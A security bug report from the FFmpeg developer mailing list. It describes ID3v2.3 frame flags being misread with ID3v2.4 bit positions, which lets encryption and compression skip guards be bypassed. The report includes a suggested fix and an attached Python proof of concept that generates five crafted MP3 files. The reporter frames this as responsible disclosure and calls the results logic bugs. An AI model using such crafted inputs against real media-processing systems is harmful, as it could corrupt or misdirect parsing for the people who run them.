Hi,

I found a flag parsing bug in FFmpeg's ID3v2 demuxer where frame flags
for all tag versions are interpreted using ID3v2.4 bit positions,
including for ID3v2.3 tags. This causes the encryption and compression
skip guards to be silently bypassed for v2.3 frames.

Affected file: libavformat/id3v2.c
FFmpeg version: N-123228-g0ddece40c5


== Root Cause ==

The flag constants in id3v2.h are defined using ID3v2.4 frame flag bit
positions:

  ID3v2_FLAG_DATALEN     0x0001  (v2.4: byte9 bit0)
  ID3v2_FLAG_UNSYNCH     0x0002  (v2.4: byte9 bit1)
  ID3v2_FLAG_ENCRYPTION  0x0004  (v2.4: byte9 bit2)
  ID3v2_FLAG_COMPRESSION 0x0008  (v2.4: byte9 bit3)

The frame parsing code in id3v2_parse() applies these constants to all
versions unconditionally:

  L936: tflags  = avio_rb16(pb);
  L937: tunsync = tflags & ID3v2_FLAG_UNSYNCH;
  ...
  L960: if (tflags & ID3v2_FLAG_DATALEN) { ... }
  L968: tcomp = tflags & ID3v2_FLAG_COMPRESSION;
  L969: tencr = tflags & ID3v2_FLAG_ENCRYPTION;
  L972: if (tencr || (!CONFIG_ZLIB && tcomp)) { /* skip */ }

But in ID3v2.3 (id3.org/id3v2.3.0), the second byte of the two-byte
frame flags field uses different bit positions:

  bit7 = compression  (0x80)
  bit6 = encryption   (0x40)
  bit5 = grouping     (0x20)
  bits 4-0 = reserved (must be zero per spec)

Because 0x0040 & 0x0004 == 0 and 0x0080 & 0x0008 == 0, the checks at
L968-969 never fire for v2.3 frames, and the skip guard at L972 is
never taken.


== Confirmed Behaviors ==

All confirmed on ASan+UBSan build (N-123228-g0ddece40c5). No memory
safety errors observed — the avio layer bounds all reads correctly.
These are logic/correctness bugs.

1. Encryption skip bypass

A v2.3 GEOB frame with the encryption flag (byte9 = 0x40) set is not
caught by the tencr check at L969. The frame reaches read_geobtag()
instead of the skip path. The encrypted data is parsed as GEOB fields
(encoding, MIME, filename, description), causing a parse failure on the
garbage content:

  id3v2 ver:3 flags:00 len:302
  Incorrect BOM value: 0x6170
  Error reading frame GEOB, skipped

Note: the "skipped" message here comes from read_geobtag() failing
mid-parse, not from the security skip guard at L972. With crafted
content mimicking valid GEOB field boundaries, the frame would be
parsed and stored silently.

2. Compression skip bypass

A v2.3 GEOB frame with the compression flag (byte9 = 0x80) set
produces no diagnostic output — clean exit, no error:

  id3v2 ver:3 flags:00 len:62
  [no GEOB messages]

The 4-byte decompressed-size prefix (present in all v2.3 compressed
frames) is silently consumed as raw GEOB fields: the first byte becomes
the encoding field, subsequent bytes become the start of the MIME
string. The rest of the compressed payload is then parsed as frame
content without any indication something went wrong.

3. False zlib decompression on v2.3 frames

Setting bits 0x09 on a v2.3 frame — reserved bits that must be zero
per v2.3 spec, but matching v2.4 DATA_LEN(0x01)|COMPRESSION(0x08) —
triggers FFmpeg to read 4 bytes as a decompressed-size indicator and
attempt zlib decompression on the remaining data. Confirmed:

  id3v2 ver:3 flags:00 len:99
  Compressed frame GEOB tlen=85 dlen=483

Decompression succeeded and the output was parsed as GEOB content.
This is the clearest proof that FFmpeg applies v2.4 flag semantics to
v2.3 frames without any version check.

4. False unsync processing on v2.3 frames

Setting bit 0x02 on a v2.3 frame (reserved in v2.3, matching v2.4
UNSYNCH) triggers unsynchronisation removal: all 0xFF 0x00 byte pairs
in the frame are collapsed to 0xFF before the data reaches
read_geobtag(). This corrupts frame data that was never unsynchronised.


== Suggested Fix ==

The flag parsing should be version-aware. The tag version is already
available at the call site. For v2.3 frames:

  if (version == 3) {
      tcomp   = tflags & 0x0080;
      tencr   = tflags & 0x0040;
      tunsync = 0;  /* v2.3 uses only the global tag-level unsync flag */
      /* DATA_LEN field does not exist in v2.3 */
  } else { /* version == 4 */
      tcomp   = tflags & ID3v2_FLAG_COMPRESSION;
      tencr   = tflags & ID3v2_FLAG_ENCRYPTION;
      tunsync = tflags & ID3v2_FLAG_UNSYNCH;
  }


== Reproduction ==

PoC script attached (poc_id3.py). Generates five MP3 files:

  python3 poc_id3.py

  # Encryption skip bypass (frame reaches parser, not skip guard):
  ffmpeg -v debug -i /tmp/poc_id3.mp3 -f null - 2>&1
  # Expected: 'Incorrect BOM value' + 'Error reading frame GEOB, skipped'

  # False zlib decompression (strongest proof):
  ffmpeg -v debug -i /tmp/poc_false_zlib.mp3 -f null - 2>&1
  # Expected: 'Compressed frame GEOB tlen=NN dlen=NNN'

  # Compression bypass (silent — no error emitted):
  ffmpeg -v debug -i /tmp/poc_comp_bypass.mp3 -f null - 2>&1
  # Expected: no GEOB messages, clean exit

Tested on Ubuntu 22.04, gcc 11, N-123228-g0ddece40c5.

Thanks,
Guanni Qu
#!/usr/bin/env python3
"""
PoC: ID3v2.3/v2.4 Flag Confusion in FFmpeg's GEOB Parser (read_geobtag)
File: libavformat/id3v2.c, function read_geobtag() ~line 477

Root Cause
==========
FFmpeg uses ID3v2.4 flag bit positions (defined in id3v2.h) for ALL
ID3v2 versions, including v2.3. The flag constants are:

  ID3v2_FLAG_DATALEN     0x0001  (v2.4 byte9 bit0)
  ID3v2_FLAG_UNSYNCH     0x0002  (v2.4 byte9 bit1)
  ID3v2_FLAG_ENCRYPTION  0x0004  (v2.4 byte9 bit2)
  ID3v2_FLAG_COMPRESSION 0x0008  (v2.4 byte9 bit3)

But in ID3v2.3 the frame flag layout (byte 9 of 2-byte flags) is:
  bit7 = compression  (0x80)
  bit6 = encryption   (0x40)
  bit5 = grouping     (0x20)

Consequences:
1. v2.3 compression (0x80) NOT detected -> compressed data parsed raw
2. v2.3 encryption  (0x40) NOT detected -> encrypted frames not skipped
3. v2.4-only bits (0x01, 0x02, 0x08) falsely trigger on v2.3 frames

The encryption skip logic at ~L972 is completely bypassed for v2.3:
  tencr = tflags & ID3v2_FLAG_ENCRYPTION;  // checks 0x0004
  // But v2.3 encryption is 0x0040 - never detected!
  if (tencr || (!CONFIG_ZLIB && tcomp)) { ... skip ... }

This causes read_geobtag to attempt parsing attacker-controlled
encrypted or compressed data as GEOB content (encoding, MIME type,
filename, description as null-terminated strings, then binary data).

Demonstrated Behaviors
======================
1. Encrypted frame bypass: GEOB with v2.3 encryption flag (0x0040)
   is NOT caught by the skip guard at L972; the frame reaches
   read_geobtag() which fails mid-parse on the garbage content.
   With crafted data mimicking valid GEOB field boundaries, the frame
   would be parsed silently.
2. Compressed frame bypass: GEOB with v2.3 compression flag (0x0080)
   has its 4-byte decompressed-size header parsed as GEOB encoding+MIME.
   No error is emitted; the compressed payload is silently consumed.
3. False zlib decompression: v2.4 DATA_LEN(0x01)+COMPRESSION(0x08)
   flags on v2.3 frame trigger zlib decompression path that shouldn't
   exist for v2.3. Confirmed: 'Compressed frame GEOB tlen=85 dlen=483'
   appears in debug output; decompressed data is parsed as GEOB content.
4. False unsync: v2.4 UNSYNCH(0x02) on v2.3 frame triggers unsync
   buffer processing, corrupting frame data not meant to be unsync'd.
"""

import struct
import zlib
import os
import sys

OUTPUT_DIR = os.path.dirname(os.path.abspath(__file__))
PRIMARY_OUTPUT = "/tmp/poc_id3.mp3"


def syncsafe(n):
    """Encode integer as 4-byte ID3v2 syncsafe integer."""
    out = bytearray(4)
    for i in range(3, -1, -1):
        out[i] = n & 0x7F
        n >>= 7
    return bytes(out)


def mp3_frames(count=3):
    """Generate minimal valid MPEG1 Layer3 128kbps 44100Hz frames."""
    # Header: 0xFFFB9004 = MPEG1 Layer3 128kbps 44100Hz stereo
    header = b'\xff\xfb\x90\x04'
    frame = header + b'\x00' * (417 - 4)
    return frame * count


def make_frame(tag, data, flags=0x0000):
    """Build an ID3v2.3/v2.4 frame (10-byte header + data)."""
    tag_bytes = tag.encode('ascii') if isinstance(tag, str) else tag
    size = struct.pack('>I', len(data))
    fl = struct.pack('>H', flags)
    return tag_bytes + size + fl + data


def make_id3v2_tag(frames, version=3, global_flags=0x00):
    """Wrap frames in an ID3v2 header."""
    header = b'ID3'
    ver = bytes([version, 0x00])
    return header + ver + bytes([global_flags]) + syncsafe(len(frames))


# ---------------------------------------------------------------------------
# PoC variant 1: v2.3 encryption bypass + false DATA_LEN + false UNSYNC
# ---------------------------------------------------------------------------
def build_poc_v1():
    """
    v2.3 GEOB frame with flags = 0x0043:
      0x40 = v2.3 encryption (FFmpeg misses this -> skip guard at L972 not taken)
      0x02 = v2.4 UNSYNC    (FFmpeg falsely activates -> unsync buffer processing)
      0x01 = v2.4 DATA_LEN  (FFmpeg falsely activates -> 4 bytes consumed as dlen)

    The frame reaches read_geobtag() instead of the skip path at L972.
    FFmpeg additionally applies DATA_LEN and UNSYNC processing before
    handing the data to read_geobtag(). The encrypted garbage causes a
    mid-parse failure ('Incorrect BOM value', 'Error reading frame GEOB,
    skipped'). That 'skipped' message comes from read_geobtag() failing,
    NOT from the security skip guard. With crafted data mimicking valid
    GEOB field boundaries (correct encoding byte, null-terminated MIME,
    filename, description), the frame would be parsed and its content
    stored silently.
    """
    # Simulated encrypted frame data
    # In v2.3 encrypted frames: 1 byte method ID + encrypted content
    encryption_method = b'\x01'

    # Build frame data: first 4 bytes consumed by false DATA_LEN
    fake_dlen = struct.pack('>I', 0x00000100)

    # Rest: encrypted content with 0xFF 0x00 sequences (affected by unsync)
    inner = encryption_method
    inner += b'\x00'  # becomes encoding byte (ISO-8859) after shift
    inner += b'application/x-poc'  # parsed as MIME
    inner += b'\xff\x00' * 20  # collapsed by unsync processing
    inner += b'\x00'  # null terminator for MIME after unsync
    inner += b'exploit.bin\x00'  # filename
    inner += b'PoC description\x00'  # description
    inner += b'\xDE\xAD\xBE\xEF' * 50  # binary payload

    frame_data = fake_dlen + inner
    frame = make_frame('GEOB', frame_data, 0x0043)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 2: v2.3 compression flag bypass
# ---------------------------------------------------------------------------
def build_poc_v2():
    """
    v2.3 GEOB with compression flag = 0x0080.
    FFmpeg checks 0x0008 (v2.4 position) -> misses compression.
    The 4-byte decompressed-size prefix is parsed as GEOB content:
      Byte 0 = encoding (0x00 = ISO-8859 if decomp size < 256)
      Byte 1 = first byte of MIME string
    No error is emitted; compressed payload silently consumed as frame data.
    """
    # Valid GEOB content that gets compressed
    geob = b'\x00'  # encoding
    geob += b'audio/mpeg\x00'
    geob += b'track.mp3\x00'
    geob += b'Embedded audio track\x00'
    geob += b'\x00' * 500  # binary data

    compressed = zlib.compress(geob, 9)
    decomp_size = struct.pack('>I', len(geob))

    # v2.3 format: [4-byte decomp size][compressed data]
    frame_data = decomp_size + compressed
    frame = make_frame('GEOB', frame_data, 0x0080)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 3: False zlib decompression on v2.3 frame
# ---------------------------------------------------------------------------
def build_poc_v3():
    """
    v2.3 frame with flags = 0x0009 (bits reserved in v2.3, but matching
    v2.4 DATA_LEN(0x01) + COMPRESSION(0x08)). FFmpeg applies v2.4 semantics:
    - Reads 4 bytes as dlen (decompressed size indicator)
    - Triggers zlib decompression on remaining frame data
    - Decompressed output passed to read_geobtag() as GEOB content

    Confirmed by debug output:
      'Compressed frame GEOB tlen=85 dlen=483'
    Decompression succeeds and result is parsed as GEOB. This is the
    strongest concrete proof: FFmpeg applied v2.4 decompression logic
    to a v2.3 frame where those flag bits must be zero per spec.
    """
    geob = b'\x00'  # encoding
    geob += b'text/plain\x00'
    geob += b'notes.txt\x00'
    geob += b'User notes\x00'
    geob += b'The quick brown fox jumps over the lazy dog. ' * 10

    compressed = zlib.compress(geob)
    dlen_bytes = struct.pack('>I', len(geob))

    frame_data = dlen_bytes + compressed
    frame = make_frame('GEOB', frame_data, 0x0009)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 4: Combined encryption + compression bypass
# ---------------------------------------------------------------------------
def build_poc_v4():
    """
    v2.3 GEOB with both encryption (0x40) and compression (0x80) flags.
    FFmpeg detects NEITHER:
      tencr = 0x00C0 & 0x0004 = 0  (v2.3 encryption missed)
      tcomp = 0x00C0 & 0x0008 = 0  (v2.3 compression missed)

    Frame should be skipped entirely but is parsed as raw GEOB.
    Data starts with 4-byte decomp size + 1-byte encryption method +
    encrypted compressed content, all misinterpreted as GEOB fields.
    No error emitted; frame silently processed.
    """
    decomp_size = struct.pack('>I', 0x00001000)
    enc_method = b'\x03'
    enc_data = bytes(range(1, 201))  # simulated encrypted+compressed data

    frame_data = decomp_size + enc_method + enc_data
    frame = make_frame('GEOB', frame_data, 0x00C0)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 5: All confusion vectors in one file
# ---------------------------------------------------------------------------
def build_poc_combined():
    """Multiple GEOB frames each exploiting different flag confusions."""
    frames = b''

    # Frame A: v2.3 encryption bypass (0x0040 not detected)
    geob_a = b'\x00' + b'text/plain\x00' + b'a.txt\x00' + b'A\x00' + b'A' * 50
    frames += make_frame('GEOB', geob_a, 0x0040)

    # Frame B: False DATA_LEN (0x0001 on v2.3)
    dlen_b = struct.pack('>I', 100)
    geob_b = dlen_b + b'\x00' + b'app/bin\x00' + b'b.bin\x00' + b'B\x00' + b'B' * 80
    frames += make_frame('GEOB', geob_b, 0x0001)

    # Frame C: False UNSYNC (0x0002 on v2.3) with 0xFF 0x00 pairs
    geob_c = b'\x00' + b'img/png\x00' + b'c.png\x00' + b'C\x00'
    geob_c += b'\xff\x00' * 30 + b'\x42' * 20
    frames += make_frame('GEOB', geob_c, 0x0002)

    # Frame D: v2.3 compression bypass (0x0080 not detected)
    decomp_d = struct.pack('>I', 500) + b'\x43' * 100
    frames += make_frame('GEOB', decomp_d, 0x0080)

    # Frame E: v2.3 encryption+compression bypass (0x00C0)
    enc_comp_e = struct.pack('>I', 200) + b'\x01' + b'\x44' * 80
    frames += make_frame('GEOB', enc_comp_e, 0x00C0)

    # Frame F: False zlib on v2.3 (DATA_LEN 0x01 + COMPRESSION 0x08)
    geob_f = b'\x00' + b'a/b\x00' + b'f\x00' + b'd\x00' + b'Z' * 300
    compressed_f = zlib.compress(geob_f)
    dlen_f = struct.pack('>I', len(geob_f))
    frames += make_frame('GEOB', dlen_f + compressed_f, 0x0009)

    hdr = make_id3v2_tag(frames, version=3)
    return hdr + frames + mp3_frames()


def main():
    os.makedirs(OUTPUT_DIR, exist_ok=True)

    variants = [
        (PRIMARY_OUTPUT, build_poc_v1, "v2.3 encryption bypass + false DATA_LEN/UNSYNC"),
        ("/tmp/poc_comp_bypass.mp3", build_poc_v2, "v2.3 compression flag bypass (silent)"),
        ("/tmp/poc_false_zlib.mp3", build_poc_v3, "False zlib decompression on v2.3 (confirmed)"),
        ("/tmp/poc_enc_comp.mp3", build_poc_v4, "v2.3 encryption+compression bypass (silent)"),
        ("/tmp/poc_all_flags.mp3", build_poc_combined, "All flag confusion vectors"),
    ]

    for path, builder, desc in variants:
        data = builder()
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] {os.path.basename(path):25s} {len(data):5d} bytes - {desc}")

    print(f"\n[*] Primary PoC: {PRIMARY_OUTPUT}")
    print()
    print("[*] Test commands:")
    print()
    print("    # Encryption skip bypass (frame reaches parser, not skip guard):")
    print(f"    ffmpeg -v debug -i {PRIMARY_OUTPUT} -f null - 2>&1")
    print("    # Expected: 'Incorrect BOM value' / 'Error reading frame GEOB, skipped'")
    print()
    print("    # False zlib decompression (strongest concrete proof):")
    print("    ffmpeg -v debug -i /tmp/poc_false_zlib.mp3 -f null - 2>&1")
    print("    # Expected: 'Compressed frame GEOB tlen=NN dlen=NNN'")
    print()
    print("    # Compression bypass (silent — no error emitted):")
    print("    ffmpeg -v debug -i /tmp/poc_comp_bypass.mp3 -f null - 2>&1")
    print("    # Expected: no GEOB messages, clean exit")


if __name__ == '__main__':
    main()
_______________________________________________
ffmpeg-devel mailing list -- [email protected]
To unsubscribe send an email to [email protected]

Reply via email to